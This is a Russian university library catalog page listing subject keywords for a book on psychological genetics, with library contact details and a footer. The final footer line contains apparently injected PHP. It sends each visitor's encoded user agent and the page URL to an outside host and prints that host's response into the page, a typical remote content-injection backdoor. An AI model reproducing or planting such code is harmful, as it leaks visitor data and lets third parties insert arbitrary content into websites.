психология -- генетика -- психологическая генетика -- классическая генетика -- наследственность -- доминирование -- материальные носители наследственности -- химическая структура днк -- генетический код -- генные мутации -- динамические мутации -- мутация -- геном человека -- хромосомы -- хромосомный набор человека -- цитогенная символика -- анеуплоидии -- аутосомные синдромы -- синдром дауна -- синдром патау -- синдром эдвардса -- синдромы половых хромосом -- хромосомные болезни -- наследственность и среда -- анализ наследственности человека -- наследственность человека -- близнецы -- генетические процессы -- генетический контроль восприятия -- интеллект -- генетика личностных особенностей -- аномалии поведения -- психические болезни -- пограничные психические состояния -- расстройства настроения -- депрессивный синдром -- депрессия -- биполярный синдром -- аутизм -- нарушение речевого развития -- заикание -- синдром туретта -- дислексия -- синдром дефицита внимания -- гиперактивность -- органические поражения мозга -- болезнь альцгеймера -- болезнь паркинсона -- хорея гентингтона -- эпилепсия -- рассеянный склероз -- болезнь феллинга -- болезнь тэя-сакса -- химическая зависимость -- генетика алкоголизма -- генетика наркомании -- генетика курения -- алкоголизм -- наркомания -- гэмблинг -- расстройство питания -- анорексия -- булемия
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 2992 - 19.08.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 0.71 с.12 запросов, 0.48c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;